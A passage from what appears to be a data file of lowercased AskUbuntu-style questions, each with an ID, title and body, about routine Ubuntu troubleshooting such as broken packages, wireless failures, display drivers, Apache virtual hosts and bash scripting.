installation candidate e : package 'sox ' has no installation candidate e : package 'ffmpeg2theora ' has no installation candidate e : package 'libmpeg2-4 ' has no installation candidate e : package 'uudeview ' has no installation candidate e : package 'libmpeg3-1 ' has no installation candidate e : package 'mpeg3-utils ' has no installation candidate e : package 'mpegdemux ' has no installation candidate e : unable to locate package liba52-dev e : package 'mpeg2dec ' has no installation candidate e : package 'id3v2 ' has no installation candidate e : package 'mpg321 ' has no installation candidate e : package 'mpg123 ' has no installation candidate e : package 'icedax ' has no installation candidate e : package 'tagtool ' has no installation candidate e : package 'easytag ' has no installation candidate e : package 'id3tool ' has no installation candidate e : package 'lame ' has no installation candidate e : package 'nautilus-script-audio-convert ' has no installation candidate
283021	iphone 4s + rhythmbox = fail ( 12.10 , ios 6.1.3 )	( this is emphatically not a double of this : how to sync songs in rhythmbox with an ipod . i 've tried everything there . ) ca n't seem to control how to add music to an iphone . it will either : try to rewrite the whole library to the iphone , causing it to run out of space , or if i drag music onto the iphone icon , i get a progress bar and a lot of cpu activity , but no files are copied to the iphone . there are no error messages , and nothing related to the process in the kernel messages . suggestions welcomed , please .
283023	12.04 lts youtube laggy after update	i am using ubuntu 12.04 lts on a very old laptop , probably was made 7 or 8 years ago . it ran very good for a long time . however , after the recent system update youtube videos on chrome became extremely laggy . it is unwatchable . also , any webpages which contains flash are loaded very slowly . firefox still works but not as fast as before . i 've tried the method in the link here , but it did not solve my problem http : //ubuntuforums.org/showthread.php ? t=1987116
283026	how can i perform an offline upgrade using ubiquity on the installation disc ?	i 'm trying to upgrade an ubuntu 12.10 installation to ubuntu 13.04 without an internet connection . now that the alternate and desktop cds have been merged , i 'm trying to use the 13.04 desktop cd in order to upgrade my 12.10 system . in ubiquity , there is an upgrade ubuntu 12.10 to ubuntu 13.04 option . so i guess this is doable . steps to replicate : in a virtual machine , install a clean , fresh ubuntu 12.10 system . apply all available updates ; shutdown the vm ; disconnect network cable from the vm . make sure your vm has no internet link -- remember i want to do an offline upgrade ; insert the ubuntu 13.04 beta 2 installation iso in the vm . reboot the vm ; select your desired language , and select install ; on preparing to install ubuntu screen , make sure again that you see no internet connection available . this prerequisite should be marked by an x on this screen . if an internet link has been found by ubiquity , disable this connection before continuing ; then , on installation type screen , observe that the upgrade ubuntu 12.10 to ubuntu 13.04 option is greyed ! ! ! it can not be selected . what is strange is the upgrade option as again available if an internet connection is found by the installer . repeat the previous steps , but this time , make sure your vm has an internet link . back on the installation type screen , the upgrade option can be selected . is this a bug in ubiquity ? is it normal -- the expected behavior -- for ubiquity to require an internet connection in order to perform an upgrade from ubuntu 12.10 to 13.04 ? ( please note that i did not have any problem doing an online upgrade using software updater from my current 12.10 install . that is not what i want to achieve -- i already wrote the online upgrade guide . what i want to know is : how can i perform an offline upgrade using ubiquity on the installation disc ? )
283028	why bios is n't recognizing usb drive during installation ?	i have a laptop that i would like to install ubuntu on . this laptop has windows xp on it , but windows wont load . i have ubuntu loaded onto a usb drive , but the computer i am trying to install it on will not recognize the usb drive in the bios menu .
283032	lower version of ubuntu ?	so i have a 702mb disk that i 'll be using , and ubuntu 12.10 is 753mb . any way to get an older version of ubuntu for my disk , then upgrade later ? thanks in advanced !
283035	how to recover python on ubuntu 12.10 ?	i 've accidentally removed /user/local/lib/python2.7/dist-packages on ubuntu 12.10 . do i need to reinstall python ? some of the softwares like ibus or software center seem do n't work any more . what should i do to recover that ? thanks .
283038	trouble configuring apache virtual hosts in ubuntu server 12.04	os : ubuntu 12.04.2 updated to the latest and greatest so here 's what i 've don so far : cd /etc/apache2/sites-available sudo nano mysite inside this file i 've written the following definition : namevirtualhost *:80 < virtualhost *:80 > documentroot /var/www/mysite servername subdomain.domain.com < /virtualhost > then enabled the site with the following command ( as root ) : a2ensite mysite then service apache2 restart all this to no avail . any suggestions ? edit : if there is more information i can add or things i can change to make getting a response more probable please let me know . thanks
283039	progress bar for python/ quickly web browser	i have been doing this web browser for roughly a day now , i have got the main look of the browser set up how i want it . i have now decided to add a little progress bar at the bottom of the main window to show how far along a page is load . the progress bar has been added using quickly ( so i have the look in the interface ) but now i can not for the life of me figure out how to get the progress bar to work when the page is being loaded . any idea 's on how i can do this guys ? my code for the web browser is as follows import gettext from gettext import gettext as _ gettext.textdomain ( 'dm-web-browser ' ) from gi.repository import gtk , webkit # pylint : disable=e0611 import logging logger = logging.getlogger ( 'dm_web_browser ' ) from dm_web_browser_lib import window from dm_web_browser.aboutdmwebbrowserdialog import aboutdmwebbrowserdialog from dm_web_browser.preferencesdmwebbrowserdialog import preferencesdmwebbrowserdialog # see dm_web_browser_lib.window.py for more details about how this class works class dmwebbrowserwindow ( window ) : __gtype_name__ = `` dmwebbrowserwindow '' def finish_initializing ( self , builder ) : # pylint : disable=e1002 `` '' '' set up the main window '' '' '' super ( dmwebbrowserwindow , self ) .finish_initializing ( builder ) self.aboutdialog = aboutdmwebbrowserdialog self.preferencesdialog = preferencesdmwebbrowserdialog # code for other initialization actions should be added here . self.backbutton = self.builder.get_object ( `` backbutton '' ) self.forwardbutton = self.builder.get_object ( `` forwardbutton '' ) self.refreshbutton = self.builder.get_object ( `` refreshbutton '' ) self.stopbutton = self.builder.get_object ( `` stopbutton '' ) self.urlentry = self.builder.get_object ( `` urlentry '' ) self.scrolledwindow = self.builder.get_object ( `` scrolledwindow '' ) self.toolbar = self.builder.get_object ( `` toolbar '' ) self.webview = webkit.webview ( ) self.scrolledwindow.add ( self.webview ) self.webview.show ( ) def on_backbutton_clicked ( self , widget ) : self.webview.go_back ( ) def on_forwardbutton_clicked ( self , widget ) : self.webview.go_forward ( ) def on_refreshbutton_clicked ( self , widget ) : self.webview.reload ( ) def on_stopbutton_clicked ( self , widget ) : self.webview.stop_loading ( ) as you can see i am using webkit and webview with python and quickly . any ideas of code that will get this progress bar to work would be really appreciated this is the code i am using to call the progress bar : fetcher = urlfetchprogressbox ( `` http : // '' + url ) fetcher.connect ( `` downloaded '' , self , on_urlentry_activate ) fetcher.show ( ) self.builder.get_object ( `` vbox1 '' ) .pack_start ( fetcher , false , false ) any help me sort this please
283043	how to remake the partitions	i have just installed ubuntu alongside with windows , but i have switched the sizes i wished for their partitions , with windows with about 500gb and ubuntu with about 100gb , though i wanted the other way around . can i just change the sizes of the partitions with the boot dvd or i have to format the hdd and do it over again ? edit : allright mates i lauched gparted as required . thing is have my linux partition inside another one , `` extended '' , which i am not allowed to unmount even when booting from live dvd . in other words , sda4 ( the extended ) includes sd65 ( with ubuntu ) and sda5 ( the swap ) . this happened after second installation process . i do n't know why the installation process made that . anyway , i can not work with remaking sizes while not unmounting sda4 . clues ?
283044	anyone have problem with hp printer printing only in green ?	i just did clean install of ubuntu 12.10 onto lenovo i3 desktop . single boot , ubuntu only system . i have a. hp officejet 6500 network printer . drivers seemed to install fine , but libre office only prints text in green . same with ms office 365 online . any thoughts ? probably something simple i accidentally turned on .
283045	ca n't login due to unity/gnome config problem	following user : `` coteyr 's '' suggestions ( 5.5.13 ) 'sudo x :2 ' did give me a black screen but no `` x '' for the mouse pointer . the log for this is apparently /var/log/x.2.log , but this did not show any errors . also had to ctrl-alt-del out of this . i then created a new user and could login using it , but it would not log out . i could also look into the old-user directories down about 5 levels but had no rights to look at any files . if i read your logic correctly this all means that xorg and lightdm are both ok and that it is a problem with my old user configuration . performed logical testing procedure thanks to coteyr and followed his advice step by step to find the personal config was `` borked '' for unknown reasons . instead of deleting .config i did as suggested and typed : mv .config .config.old which i gather backs it up and allows a new .config to be created next time you boot/login . this allowed login of my original user and hence direct access to all my old files . however , there were a few `` 12.04 has experienced an error '' windows popping up to do with : /usr/bin/gnome-session /usr/bin/gsettings /usr/bin/l2tpipsecvpn all crashed . so in the end this was not a lightdm or xorg problem , but a unity/gnome config problem . 7th may : since the second login on 12.04 i have not been able to get online , but have just been able to check using wifi , which works . so my dsl connection is now not recognised . i know this is not the same question but can anyone help or should i post this as an additional problem ?
283049	problems rendering in kdenlive	so i have a basic kdenlive project ; hd 720p 24fps . when i click render , everything starts okay but then it 's finished after about 10 seconds and says everything was done successfully . however , when i go to play the video i get an error message , the video does n't even have a thumbnail in nautilus . i 've tried rendering in many different profiles/combinations . nothing is working . what 's going on ? i 've rendered videos in kdenlive before , any ideas ? ubuntu 12.10/latest version of kdenlive
283050	system moniter incorectly shows cpu constantly on 100 % ,	running absolutely nothing , my system monitor states that all four cores of my amd phenom ii 945 are at 100 % , although no individual process can be traced to cause this . at most , firefox takes 4 % of my cpu-usage . so what 's up with that ? i 'm running ubuntu 12.10 .
283056	gnome theme background color is black	i 'm having a problem with my default gnome 3.6.0 setup on 12.10 . i used to create themes in gnome 2 and gnome 3.0 , but i 'm at loss to explain why my theme is black in the background . this problem is limited to adwaita , and there are not any issues with ambiance or radience . i guess it is n't a really big deal because i 'm going to upgrade soon , but until then gnome is going to be looking pretty ugly ; almost unusable .
283057	how do i install ubuntu server on foxconn nano pc ?	as stated in the subject i am experiencing issues installing ubuntu 12.04.2 server on a foxconn nt-i2847 intel nm70 . i have tried both the i386 and amd64 with the same result - `` problem reading from cd-rom '' / md5 check sum not matching up . i am trying to install from a thumb drive as the nano pc does not have a cd-rom . i have read other threads stating work a around by including the iso on the thumb drive and mounting it etc but non of these options have worked . i have burned the same iso files to disk and have had successful installs on my desktops but to no luck on this nano pc . i have tried unetbootin , linuxlive usb creator , universal usb installer and several other program for putting the iso onto the usbthumb drive with the same result . i have even tried multiple flash drive manufacturers - pny , scandisk etc . i know people or going to state this question has been asked before however i have been combing through these and several other forums , and emulating fixes that worked for other people to no result .
283058	i ca n't get ubuntu to download	i have n't used ubuntu for a few years so i thought i 'd give it a try once more . i donated and then tried to download only to have it keep trying to connect - never allowing me to actually get the program . i even hit the `` download now '' button to no avail . please advise .
283060	how do i use my home directory on a separate partition ?	my understanding of disc partitioning has always been that you partition a disc to install multiple operating systems so you can boot from multiple operating systems on a single disc . however i 'm reading a ubuntu server book and it talks about partitioning the /home directory of a ubuntu installation . `` the /home directory is a popular partitioning candidate among both administrators and desktop users alike because it holds all of the personal files for user accounts on that machine . if you maintain /home as a separate partition , you can install new versions of a distribution or even different distributions altogether without wiping out any user settings . '' i do n't see how and why anyone would partition the home directory or any other directory for that matter in the file system of a ubuntu installation .
283063	how to revert back to previous state from current updated state in ubuntu 12.10 ?	i updated my ubuntu 12.10 . after updating it asked for reboot , i rebooted my system . after rebooting my system it shows only blank ( black ) screen , no mouse cursor , no terminal nothing . i want to revert back to my previous state of system just before the update happened . ( i remembered some packages installed while updating they are xorg , linux-header , etc.. ) thanks .
283064	contents of downloads folder are gone ubuntu 12.04	my downloads folder was there till evening . i went to my room and did a ssh onto my work machine and i find that the downloads folder is empty . i have some important files in downloads folder . can anybody help me finding my contents ?
283072	nautilus is n't displaying thumbnails for my nef files ( photo raw )	i 'm not getting any thumbnails in nautilus for my nef files ( photo raw ) . is there an easy way to repair this ?
283076	tags in ubuntu 12.04	one can attach tags with files or folders in ubuntu 12.04 . q1 . if i transfer those files or folders to somebody over email or to another computer , will the tags also remain attached with the files and folder ? q2 . i have attached a new tag to a file just now . now when i am trying to attach the same tag to another file , it is not allowing me to do that . how can i solve the problem ?
283077	how to supress 0 deletion in bash script arithmetic operations ?	as an example , here is the code : # ! /bin/bash s=00 until [ $ s -eq 60 ] do let `` s += 1 '' echo $ s done $ s will be 1 , 2 , 3 etc , but not 01 , 02 , 03 etc . how can i avoid this deletion of 0 ? so , i need $ s to be 01-09 , then 10 , 11 , etc .
283082	lubuntu wine idm set up with chromium help needed	i 'm very new to this forum and to linux . switching from windows os is tough at the start and i 'm having few problems . i installed lubuntu because i 've old system . i totally love it but i have one major issue . i want a download manager for lubuntu . i searched in software centre but could n't find any good one . so i installed wine and some how i managed to install it correctly . after that i installed idm successfully . but the problem starts now , when i open any download link , chromium automatically downloads itself . means it doesnot open idm . i installed an idm plugin as well but still it doesnot work . another thing i did was to manually copy download link address to idm , and i can see the file and i click resume button but download doesnot starts . what should i do ? any other download manager i need to try ?
283084	wireless interface stopped working after routine updates	i 'm running ubuntu 12.04 on a lenova thinkpad . i updated a few days ago , and my wireless interface has basically disappeared . i can see where they should be when i click on my internet icon , but they 're ghosted out . i 've tried the /etc/init.d/networking start and the 'service networking start ' but i was n't getting anywhere with either of them . i found this question : unable to connect to wifi network after updates and tried it out : cordelia @ bug : ~ $ rfkill list wlan 0 : phy0 : wireless lan soft blocked : yes hard blocked : yes cordelia @ bug : ~ $ rfkill unblock wlan ca n't open rfkill control device : permission denied cordelia @ bug : ~ $ sudo rfkill unblock wlan cordelia @ bug : ~ $ sudo service network-manager restart network-manager stop/waiting network-manager start/running , process 6814 that fixed his wireless , but i still ca n't get mine to work . and i really do n't know why . my ifconfig looks like this : eth0 link encap : ethernet hwaddr 00:1f:16:0b:5b : b3 inet6 addr : fe80 : :21f:16ff : fe0b:5bb3/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:3892 errors:0 dropped:0 overruns:0 frame:0 tx packets:4116 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3528991 ( 3.5 mb ) tx bytes:582490 ( 582.4 kb ) interrupt:20 memory : f2600000-f2620000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:4835 errors:0 dropped:0 overruns:0 frame:0 tx packets:4835 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:390732 ( 390.7 kb ) tx bytes:390732 ( 390.7 kb ) and my lspci : 03:00.0 network controller : intel corporation pro/wireless 5100 agn [ shiloh ] network connection my dad poked around but could n't find a solution . when i click on the wireless interface it gives me this list of data : type : wireless 802.11 connection state : unavailable ip address : no ip address . connection speed : unknown system name : wlan0 mac address : 00:21:5d:91:28 : da driver : iwlwifi i do n't know what i 'm doing wrong or not doing right . is there anything else i need to try or tell you ?
283086	install chromium adobe plugins error	i can not view any video because of this . i dont want to use any other browser . when i click `` install plugins '' , it takes me to the adobe website and it tells that chromium and chrome have built in flash players . so what should i do now ? i removed chromium and then installed again but still same error .
283088	only the wallpaper and cursor show on ubuntu 12.04	i tried to make some effects but now i can only see a wallpaper and cursor , nothing else . i can normally use right click button also , but it does n't work either .
283096	plasma popup in ubuntu	i am looking for the source code for a plasma kind of popup and edit it to display my own messages . this is the type of the popup i have been looking for . can anyone suggest me some links . thank you .
283099	flash stopped playing sound	my ubuntu stopped playing sound . i tried to search what i am using as sound device , but the system manager just says `` built in audio '' can you please direct me what should i try ? so far i only tried the flash settings and verified that ubuntu can play sound using flash .
283105	theme with thin borders ?	q1 what themes has a thin top border ? q2 could i in an easy way change the size of the topborder of the default ambiance theme background i 'm trying to switch to using ( almost ) the default ubuntu desktop distro setup instead of doing lots of customization 's as switching of window manager and mapping keys for example . because all that fiddling with the setup has stolen lots of time from me at every install , upgrade , and reinstall that i have done at work and at home during the last 20 years . the default theme ( ambiance ) which i mostly like has a top border thats 28px high which i think is wasting a lot of space on my screen if i have a bunch of windows on the same desktop . i have tried to use myunity to switch theme but it does not update the themes correctly immediately and surfing for new themes on the web is also very hard since i found no good searchtool where i could see the border look in a quick way .
283111	brightness does n't work after sleep with ubuntu 13.04	i have a problem with my toshiba satellite r850 . the brightness-adjustment via the function-keys and the system settings works properly , but not after putting the laptop on sleep-mode . the answer given in this thread did the trick for me with ubuntu 12.10 64-bit , but does n't seem to work with ubuntu 13.04 64-bit . has anyone experienced the same and know a workaround for this ?
283113	after first reboot choose wrong video port	sorry for my english . i had installed ubuntu 12.04 on intel motherboard with atom and igd 3000 . on this board two video outputs : d-sub ( vga ) and dvi . my monitor have only d-sub . after installation sytem was updated/upgraded and of course rebooted . bios , post ... and black screen . some more rebooting ... nothing changed . i had an idea that ubuntu choose wrong output videoport . brought from a neighbor another monitor with dvi . and had the ubuntu on the screen . but in the settings is missing vga monitor . any idea/help ? i have only integrated graphic , and no pci/pci-ex ports i think need to edit some config to correct video mode . because on another monitor that has resolution 1920*1080 it works , but on 17 '' with 1280*1024 not . after some more manipulation ubuntu had started at 17 '' monitor . but only once . and i can see that ubuntu think that there is two monitors : one is my 17 '' and another named `` laptop '' . and output in that laptop , all features in setting window is blocked . i do n't know what to do next . just reinstall distributive . and step by step watching . ubuntu see two monitors , one of them is my samsung connected via vga , and other called laptop connected via lvds . but i had only only one samsung via vga ... and no any lvds port . so , when i turned off lvds display in settings it turn off samsung . ubuntu see my samsung as lvds connected display with resolution 1920*1280 and show me just a part off desktop because samsung have maximum resolution 1280*1024 . and any changing off resolution of any display turning off video outputs . and if i use xrandr and it options nothing happen . but this is the other problem , which i think could find in other forums .
283117	software center will not start	i tried to launch ubuntu software center to day , but it did n't start , so i tried launching it through the terminal , giving this error : 2013-04-19 10:21:51,505 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-04-19 10:21:51,527 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2013-04-19 10:21:51,755 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/dbus/proxies.py ' , 410 , '_introspect_error_handler ' ) ' 2013-04-19 10:21:51,754 - dbus.proxies - error - introspect error on com.ubuntu.sso : /com/ubuntu/sso/credentials : dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : process /usr/lib/ubuntu-sso-client/ubuntu-sso-login exited with status 1 traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 130 , in < module > app = softwarecenterappgtk3 ( options , args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 337 , in __init__ self.icons ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/appmanager.py '' , line 66 , in __init__ self.oauth_token = helper.find_oauth_token_sync ( ) file `` /usr/share/software-center/softwarecenter/backend/ubuntusso.py '' , line 139 , in find_oauth_token_sync sso.find_credentials ( ) file `` /usr/share/software-center/softwarecenter/backend/login_impl/login_sso.py '' , line 75 , in find_credentials self.proxy.find_credentials ( self.appname , self._get_params ( ) ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 70 , in __call__ return self._proxy_method ( *args , **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 145 , in __call__ **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : process /usr/lib/ubuntu-sso-client/ubuntu-sso-login exited with status 1 this was after i installed lxde , and started using that instead of unity , i do n't think that 's related , but i thought you should know . running ubuntu 12.10 64bit
283124	ubuntu not booting after using ubuntu-tweak 's janitor function	i 'm pretty new to ubuntu . this morning my ubuntu 12.04 would not boot up properly anymore . after the loading screen saying `` ubuntu '' with the five little dots it just goes black and nothing happens . the only remarkable change i made yesterday was installing ubuntu-tweak and using the janitor to clean my system . i 've tried the dpkg option in the recovery menu , but that did n't help . any advice what else i can try ?
283125	why use ubuntu for php	after doing some research on google i found that most of the company is using lamp for php development . is there any big advantage using ubuntu for php ?
283127	virtualbox xp guest ca n't modify or delete files on shared folders	i 'm running virtualbox 4.1.18 on ubuntu 12.10 host and running a win xp sp3 guest i can not rename or delete files once created . win guest complain with the error : e : \ is not accessible incorrect function just the host can . first of all , i wan na say clearly that i followed instructions : guest addiction installed ( 3 times ) in xp guest ubuntu user added to vboxusers group specified the folder to share in vm settings both before and after running the xp guest i tried also running virtualbox as root , same error . furthermore , instead of sharing an ntfs partition , i even tried using a normal folder in ubuntu filesystem , owned by ubuntu user . same error . the sharing always works , but the modify / deletions of files do n't . i read several forums on the web and a lot of people are reporting this as a bug for years ... is this possible ? ? after new versions and releases still this is not working ? anybody had ever found a workaround for this ? please help ... tia enrico one other piece of information - if i double-click on the file to execute the default action ( e.g. , double-click on .txt opens file in notepad , double-click on .rdp runs rdp file ) , it works fine . it 's only if i try to edit such files that i get the behavior . two things that are odd about this setup ( to me ) : 1 ) if i browse directly from start/run to \vboxsrv\sharename , it opens \vboxsvr\sharename ( note the change in name - srv vs. svr below ) : 2 ) when i open it in this manner ( as opposed to browsing to the assigned drive letter ( e.g. , double-clicking on the e : drive ( in my case ) under my computer ) , as shown in image above , i can edit the files ! to reproduce on xp guest : browse to a file on the shared folder ( e.g. , test.txt ) - you must browse to the drive letter assigned to the share . right-click and select edit from the context menu .
283129	gui development with glade/freebasic - missing gtkwidget.bi	trying gui development with combination of glade , freebasic and geany , compilation fails because no gtkwidget.bi include file can be located . in fact this file is missing from my computer ( ubuntu precise pangolin )
283131	what is the hotkey for switching workspaces in ubuntu 13.04 raring ringtail ?	since i upgraded to raring my workflow is hindered by abandoning the hotkeys for switching between workspaces . i used ctrl-alt-left/right/up/down a lot to switch between workspaces , and ctrl+alt+shift+left/right/up/down in order to move windows around . currently the only way i see is to launch the workspace switcher with super+s , but i 'd like to get the old keys back . how can i do that ? or is there another default combination now ?
283134	how to find the version of the dash shell on ubuntu /bin ?	i would like to know if there is a way for find the shell dash version . i tried several commands like : dash -v , dash -v , dash -- version , but no one works . dash shell wikipedia : http : //en.wikipedia.org/wiki/debian_almquist_shell
283136	why is usb file transfer so slow in 12.10 ?	i was getting the usual 4-8mbps in 12.04 when copying files via usb sticks . however after upgrading to 12.10 , i only get 200-300kbps when i try to perform the same operation . i have tried different usb sticks ( which work flawlessly on windows 7 ) and still experience the same issue . i experienced the same issue sometime ago on 11.10 but everything was normal when i upgraded to 12.04 so it might be a kernel issue . here 's the output of dmseg |tail : mysterio @ mysterio-hp-pavilion-dv6700-notebook-pc : ~ $ dmesg |tail [ 871.023093 ] sdb : sdb1 [ 871.026909 ] sd 5:0:0:0 : [ sdb ] no caching mode page present [ 871.026920 ] sd 5:0:0:0 : [ sdb ] assuming drive cache : write through [ 871.026927 ] sd 5:0:0:0 : [ sdb ] attached scsi removable disk [ 1036.226206 ] iso 9660 extensions : microsoft joliet level 3 [ 1036.233561 ] iso 9660 extensions : rrip_1991a [ 1086.342973 ] iso 9660 extensions : microsoft joliet level 3 [ 1086.343010 ] iso 9660 extensions : rrip_1991a [ 1173.971357 ] iso 9660 extensions : microsoft joliet level 3 [ 1173.971441 ] iso 9660 extensions : rrip_1991a i have updated my system with the latest updates . what could be wrong ?
283138	issues with lenovo c440	new lenovo c440 , initialised m/s to check machine and validate warranty . otherwise nought on it , apart from usual buy this , use this garbage that came pre-installed . burned new disc ( 12.04.2 64amd ) from ubuntu site and it ran checksum to validate , happy loaded disc into new machine , would n't boot from bios like my old lenovo n200 laptop . but it would open an wubi.exe file in m/s and install , running checks , with `` success message '' , to reboot . upon rebooting it showed dual icons to choose either ubuntu or m/s . lol dual boot.. ? start ubuntu , it failed , message read \ubuntu\winboot\wubildr.mbr\0xcooooo7b missing files or errors have occurred . burn new disc and repeat , same again . then another ... ! ? download ( 12.04.2amd & intel em64t ) from https : //help.ubuntu.com/12.04/installation-guide/index.html and burn disc on lenovo c440 as the optics in the cd/rom are newer . failed again . not happy tried a download onto old laptop using its cd/rom to burn 12.10 version , again no joy . throughout the different installations got same message . \ubuntu\wubildr.mbr\0xcooooo7b missing files or errors . run out of ideas now , did try switching on and off the csm legacy in the start up section ( this machine requires continued f1 pressing on and of while it starts up ) , ditto with auto mode , leaving the uefi on , it took or has priority ... ? if any can help , please a step by step idiot guide , still have my l-plates on , lol : )
283139	what is juju and charm store	i want answers for below questions . what is juju ? how to work with it ? what does charm means ? is ubuntu server edition is required for use juju ? or desktop edition can run ? any one have some reference links for ebooks or something like that , can help ? any help are appreciated . thank you .
283140	after xorg update i have a black screen	i have ubuntu 12.10 , my video card is amd hd radeon 7670m , and i have installed it 's driver . it worked perfectly untill today , when i made this updates : *important security updates : 1.common files used by various x servers ( xserver-common ) 2.xorg x server-core server ( xserver-xorg-core ) *other updates ( lp-ppa-webupd8team-java ) 1.oracle java ( tm ) development kit ( jdk ) 7 ( oracle-java7-installer ) 2.oracle jdk7 installer meta package ( oracle-jdk7-installer ) now , it loads grub , whatever i chose i get a purple screen , blocked , with the load bar and that 's it . nothing happens . please help me if there is something to fix this , if nothing works i will just reinstall ubuntu , but i have a lot of file and programs and i do n't want to really do this . thank you .
283142	how can i restrict users fom changing network settings and adding new connection using network manager ?	i want to restrict users from changing network settings like changing ip address of the system and adding new connections , i have removed administrator rights from the user and user is not able to change the existing connection 's settings but still he can create a new connection through network-manager . how can that be blocked ?
283145	pattern based , batch file rename in terminal	i need to rename the following : file_001_loremipsum.png file_002_dolor.png file_003_sit.png file_004_amet.png file_105_randomness.png into upl_loremipsum.png upl_dolor.png upl_sit.png upl_amet.png upl_randomness.png how do i make it happen with just one simple line of terminal command ?
283149	age of empire install problem	i 've mounted the aoe iso and it seems working . but when i start a game , get an error message `` you must insert a game cd to play a single player game , and then restart age of empires '' . here is what i 've done to mount the iso . sudo mkdir /media/iso sudo cp age_of_empire_1/ageofempirei.iso /media/iso sudo mount -t iso9660 age_of_empire_1/ageofempirei.iso /media/iso -o loop mount : warning : /media/iso seems to be mounted read-only i dont know whether direct correlation between the setup install directory and the error but this is where the game is installed i think : c : \program files\microsoft games\age of empires any help would be appreciated .
283158	how to install ubuntu in asus eee pc 1015cx ?	hi i would love to use ubuntu as my default os in my new asus eee pc 1015cx . it comes with a default express gate cloud os and i would like to know the steps on how to create a usb bootable drive and install . can somebody , please , help me with this ? thanks !
283160	ubuntu live-usb does n't save settings	when i boot my laptop using my live-usb , and then change the settings ( e.g . desktop wallpaper ) and then reboot , the settings go back to default . how do i make the live-usb save the settings ?
283166	how to install tv-maxe	i am having problems install tv-maxe on one laptop the issue is that is asking for ubuntu 12.04 lts cd to be in /cdrom/ . apparently the issue are the files lirc and setserial that will not install , tried with command line , synaptic and software center , mounted ubuntu iso on /media , /cdrom , /home ( default of furius iso ) , mounted live usb and still it will not install the files . i have the ppa installed for tv-maxe and internet connection . any workarounds ?
283167	bash script indenting command line	hi i have used the following script , which after it has run and exited , causes my command line to display no text when typing , and after each carriage return instead of starting a new line like root @ alix : ~ # root @ alix : ~ # i get root @ alix : ~ # root @ alix : ~ # root @ alix : ~ # root @ alix : ~ # etc when using ctrl c i get root @ alix : ~ # root @ alix : ~ # root @ alix : ~ # etc here is the script : # ! /bin/bash # # # # # # run command for given number of seconds then kill it # # # read -p `` how long should i run for ? == > `` count_secs echo `` time specified : `` $ count_secs if [ $ count_secs -gt 0 ] then # # # # # # number of seconds greater than zero # # # watch -n 0.5 'iw dev wlan0 station dump | grep `` signal avg '' > > processmonitor.log ' > > /dev/null & # # # # # # assume that the pid of the command is $ $ # # # my_pid= $ ! sleep $ count_secs kill -15 $ my_pid fi thanks .
283175	occasional latency spike between two servers	4 servers on a private network which all talk to each other using dedicated 1gbps network adapters . when i mtr from one to another , out of 100 requests , i 'll get 98 that are 0.2ms or 0.3ms , 1 which is 300ms and 1 which is 1200ms ( as a rough example ) . what could explain such sporadic spikes ? we are n't transferring huge amounts of data between them , but it is a steady stream . thanks
283178	ubuntu 10.04 broken package ( build-essentials )	i do know there are questions like mine , but i could n't get it work reading their answers . i 'm trying to install build-essentials , but the package is broken , therefore i ca n't install the needed compiler . the following packages have unmet dependencies : build-essential : depends : libc6-dev but it is not going to be installed or libc-dev depends : g++ ( > = 4:4.3.1 ) but it is not going to be installed e : broken packages what i tried so far : sudo apt-get update sudo apt-get upgrade sudo apt-get install build-essential -f none of the above worked . i suppose the problem is in my sources.list , here is it : deb http : //archive.ubuntu.com/ubuntu/ lucid main restricted universe deb-src http : //archive.ubuntu.com/ubuntu/ lucid main restricted universe how can i fix it ? thanks in advance !
283180	second screen tearing amd radeon 5800 hd ubuntu 12.10	well , i 've been trying to get this work for a while ... the second screen does n't stop tearing . i 'm using `` amd catalystâ˘ 13.1 proprietary linux x86 display driver '' which was install according to : http : //wiki.cchtml.com/index.php/ubuntu_quantal_installation_guide # generate_a_new_.2fetc.2fx11.2fxorg.conf_file i also installed `` additional drivers '' , and tried the x.org x server driver , but its performance are embarrassing . i checked `` tear free '' option in the catalyst config gui . i also unchecked sync to vblank compizconfig . ( as suggested in how to get amd graphics card working well 12.04 ? ) non of this seem to help . does anyone got a clue ? thanks !
283181	lock icon in external drive 's folders	when i attach the external hard drive , the folders have a lock icon on them and i am unable to delete them . i tried to use sudo chown -r $ user : $ user $ home but to no avail , this did not work . please tell how to remove that icon and edit the read-only permission .
283182	ubuntu 13.04 no 5.1 sound sweex sc016	i am using now 13.04 and sound 5.1 does n't work well , only the 2 front speakers work , in ubuntu 12.10 work all good all speakers play . i am using the usb sound card sweex sc016 .
283186	sleep button no longer works	i need the sleep button on my keyboard ( aptly labelled zzz ) to put the laptop to sleep , but pressing it no longer does anything . i 'm pretty sure it used to work . output from xev : focusin event , serial 39 , synthetic no , window 0x4000001 , mode notifygrab , detail notifypointer keymapnotify event , serial 39 , synthetic no , window 0x0 , keys : 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 focusout event , serial 39 , synthetic no , window 0x4000001 , mode notifyungrab , detail notifypointer i 'm not sure what this means and how to go about debugging it . please help .
